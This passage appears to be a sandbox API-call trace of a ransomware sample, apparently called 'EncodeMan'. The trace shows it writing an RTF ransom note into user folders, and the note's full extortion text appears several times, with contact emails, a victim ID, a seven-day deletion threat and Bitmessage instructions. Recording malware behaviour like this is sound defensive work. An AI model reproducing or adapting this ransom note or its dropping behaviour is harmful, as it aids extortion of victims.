ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.205] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.205] CloseHandle (hObject=0x2ec) returned 1 [0291.206] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\#readme_eman#.rtf")) returned 0xffffffff [0291.206] GetLastError () returned 0x2 [0291.206] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.206] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.206] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.206] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w 